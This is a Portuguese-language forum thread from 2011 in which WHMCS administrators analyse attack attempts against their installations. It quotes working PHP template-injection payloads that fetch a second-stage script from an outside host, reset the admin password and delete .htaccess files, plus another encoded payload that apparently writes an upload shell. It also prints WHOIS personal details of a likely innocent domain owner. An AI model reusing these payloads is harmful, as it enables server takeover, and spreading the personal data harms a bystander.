Tentativas de invasão em meu WHMCS

[Marco Antonio]

como quasi todos os ataques tem o mesmo bloco de IP sugiro a todos bloquear nos seus servidores os ips

87.106.140.30 até o 87.106.140.50....

[edvan]

como quasi todos os ataques tem o mesmo bloco de IP sugiro a todos bloquear nos seus servidores os ips

87.106.140.30 até o 87.106.140.50....

Recebi hoje 09/12/2011 às 00:47 um ticket no departamento Abuse e SPAM enviado por John com o assunto abaixo e vejam o que descobri de interessante!

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDhLSkdacGJHVWdQU0JtYjNCbGJpZ2llR1p5TG5Cb2NDSWdMQ0ozS3lJcE95UnpZVDFtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWduYUhSMGNEb3ZMMnhwWW1WeVpHRmtaV1JwWjJsMFlXd3VZMjl0TG1KeUwzZHdMV052Ym5SbGJuUXZZbWxuWkhWdGNDNTBlSFFuS1Rza2QzSnBkR1VnUFNCbWQzSnBkR1VnS0NSbWFXeGxJQ3drYzJFcE93by9QZz09Iik7CiRmbyA9IGZvcGVuKCJlZDgucGhwIiwidyIpOwpmd3JpdGUoJGZvLCRjb2RlKTs=')){/php})

Até aí normal? Fui ver o IP: 189.68.190.8

Daí percebi ataque do brasil ( 189-68-190-8.dsl.telesp.net.br ) ? Fui investigar o código e tive uma BELA surpresa:

$code = base64_decode("PD8KJGZpbGUgPSBmb3BlbigieGZyLnBocCIgLCJ3KyIpOyRzYT1maWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpYmVyZGFkZWRpZ2l0YWwuY29tLmJyL3dwLWNvbnRlbnQvYmlnZHVtcC50eHQnKTskd3JpdGUgPSBmd3JpdGUgKCRmaWxlICwkc2EpOwo/Pg==");

$fo = fopen("ed8.php","w");

fwrite($fo,$code);

<?

$file = fopen("xfr.php" ,"w+");$sa=file_get_contents('http://liberdadedigital.com.br/wp-content/bigdump.txt');$write = fwrite ($file ,$sa);

?>

Se meu WHMCS não tivesse atualizado com a correção para esse ataque o código iria criar um arquivo chamado ed8.php em seguida ele iria "baixar" um arquivo via URL do site

http://liberdadedigital.com.br/wp-content/bigdump.txt ( http://awesomescreenshot.com/029pu6pcd )

Com a seguinte funcionalidade:

< ?

// Database configuration

require("configuration.php");

mysql_connect($db_server, $db_username, $db_password);

mysql_select_db($db_name);

$b00x = mysql_query("update tbladmins set password='e10adc3949ba59abbe56e057f20f883e',username= 'admin',roleid='1' where id='1' ");

if ($b00x) {

echo "tmaaaaaaaam :P";

}

print $customadminpath;@unlink("$customadminpath/.htaccess");@unlink("admin/.htaccess"); ? >

Esse código iria puxar as informações da base de dados contida no configuration, iria alterar a usuário/senha do id 1 par admin/123456. Em seguida iria captura/exibir a pasta customizada no meu WHMCS e remover os arquivos .htaccess existentes!

Gostaram?

Pelo Domain Dossier http://centralops.net/co/DomainDossier.aspx?addr=http%3a%2f%2fliberdadedigital.com.br%2fwp-content%2fbigdump.txt&dom_whois=true&dom_dns=true&traceroute=true&net_whois=true&svc_scan=true algumas informações:

Address lookup

canonical name liberdadedigital.com.br.

aliases addresses 187.110.226.240

Proprietário do domínio:

domínio: liberdadedigital.com.br

entidade: Emílio Moreno

documento: 011.831.658/0001-61

responsável: Liberdade Digital

endereço: Rua Esmerinda Mendes, 1024, Luc. Cavalc.

endereço: 60810-840 - Fortaleza - CE

país: BR

telefone: (85) 88558552 []

ID entidade: EMN130

ID admin: EMN130

ID técnico: CLJ34

ID cobrança: EMN130

servidor DNS: dns1.dnscenter.com.br

status DNS: 08/12/2011 AA

último AA: 08/12/2011

servidor DNS: dns2.dnscenter.com.br

status DNS: 08/12/2011 AA

último AA: 08/12/2011

servidor DNS: dns3.dnscenter.com.br

status DNS: 08/12/2011 AA

último AA: 08/12/2011

criado: 12/01/2006 #2552246

expiração: 12/01/2012

alterado: 21/01/2011

status: publicado

ID: CLJ34

nome: Cláudio Luiz Freire Lima Júnior

e-mail: [email protected]

criado: 30/05/2001

alterado: 16/02/2009

ID: EMN130

nome: Emilio Moreno da Silva Neto

e-mail: [email protected]

criado: 21/12/2005

alterado: 19/04/2009

Hospedado na:

inetnum: 187.110.226/24

aut-num: AS28598

abuse-c: SABNE4

owner: ARGO COM E SERV EM SISTEMAS DE INFORMACAO LTDA

ownerid: 007.234.386/0001-45

responsible: CLAUDIO FREIRE JUNIOR

country: BR

owner-c: AHS118

tech-c: AHS118

inetrev: 187.110.226/24

nserver: dns1.argohost.net

nsstat: 20111208 AA

nslastaa: 20111208

nserver: dns2.argohost.net

Um pouco da vida do Emilio Moreno:

- http://www.linkedin.com/in/emiliomoreno

- https://twitter.com/#!/emiliomoreno

- http://about.me/emiliomsn

Minha conclusão:

Talvez ele não seja responsável pelos ataques, alguém utilizou o site dele para hospedar o arquivo bigdump.txt.

Obviamente quem fez isso tem um conhecimento razoável de WHMCS pois conhece as variáveis internas do sistema!

Providências:

Notifiquei o e-mail [email protected] e ao datacenter [email protected] e [email protected] para que sejam tomadas as providências cabíveis.

Pode isso Arnaldo?

Editado Dezembro 9, 2011 por edvan
Edição

[edvan]

Creio que o emilio na verdade foi vitima no assunto vejam isso http://awesomescreenshot.com/0c9pua49f ao acessar http://liberdadedigital.com.br/wp-content/

[avonni]

Bom, tem alguma coisa estranha aí!

É impressão minha ou o ataque ficou mais "sofisticado", agora tentando remover até os .htaccess, e logo 1 dia depois de eu ter sugerido a utilização deles aqui no fórum?

Coincidência?? :confused:

Começo a achar que pode sim ser alguém aqui do fórum que está realizando estes ataques, como já comentaram aqui antes.

A moderação devia fazer uma busca pelos IPs que foram citados aqui pra verificar se tem algum usuário mal intencionado utilizando o fórum afim de prejudicar os demais membros.

[Jaime Silva]

Edvan -> santo protetor do WHMCS e de seus usuários ;)

Ysaac -> coincidência? será? é bom o santo protetor dos usuários do fórum (Marco Antônio) ver isso aí.

[joaopaulo]

Ysaac, já estamos trabalhando na hipótese citada.

Porém há um detalhe: O Atacante não necessariamente é um usuário cadastrado. O Fórum é aberto para não cadastrados.

Uma solução ineficiente mas temporária seria: Retirarem vossos links do perfil e assinatura por ora.

Abraços

[Marco Antonio]

Edvan -> santo protetor do WHMCS e de seus usuários ;)

Ysaac -> coincidência? será? é bom o santo protetor dos usuários do fórum (Marco Antônio) ver isso aí.

Jaime, nao precisa da indireta, a primeira atitude que tomei ontem bem antes de vc falar que poderia ser alguem do forum foi dar uma geral e pesquisar usuarios, etc.. (ainda estamos verificando) e tem, dois fatos:

1- Como João Paulo diz: o forum é aberto, qualquer usuario pode ler os post ver os comentarios, etc. O seja, ser usuario ou nao, todos os post podem ser visitados por nao cadastrados...

2- O senhor se esquece que eu tambem foi atacado e assim como vc e os outros quero e muito que isso seja resolvido....

[AngelCosta]

Quanta confusão! Pode ser gente aqui do fórum, pode ser visitante, pode ser até terrorista.

Infelizmente, não temos como fazer pesquisa de antecedentes criminais, atestado de bom caráter ou pesquisa spc/serasa para permitir o registro no fórum.

Mas se ficar claro que foi alguém daqui, o membro será expulso da comunidade.

Enquanto isso:

- Atualizem o WHMCS de vossas senhorias para a versão mais atualizada: https://www.whmcs.com/members/clientarea.php?action=productdetails

- Usem e abusem das dicas de segurança do Tio ED: http://www.whmcs.blog.br/tag/seguranca/

- Usem as dicas do whmcs para segurança extra após a instalação: http://docs.whmcs.com/Further_Security_Steps

- Os que realizaram modificações nos templates de WHMCS devem verificar com cuidado ao incluir códigos sem saber o que eles fazem exatamente

- Cuidado ao seguir dicas de pessoas "novas" ou que você não conhece - aqui no fórum ou fora dele.

- Eu nem vou falar aos que usam WHMCS nulled (pirata).

Quem tiver sendo atacado ou seu whmcs se comportando "esquisito" mande uma PM para mim ou para os admins do fórum e dê informações sobre o "ataque".

[edvan]

Realmente minha "sobrinha" tá certa.

Especulações/acusações não adianta de nada... vamos nos proteger!

Vulnerabilidades você encontra em N tipos de sistemas.

[Alexandre Duran]

Tb recebi:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

Detalhe, como exatamente eu descripto este código para saber que comando/script esta sendo executado ?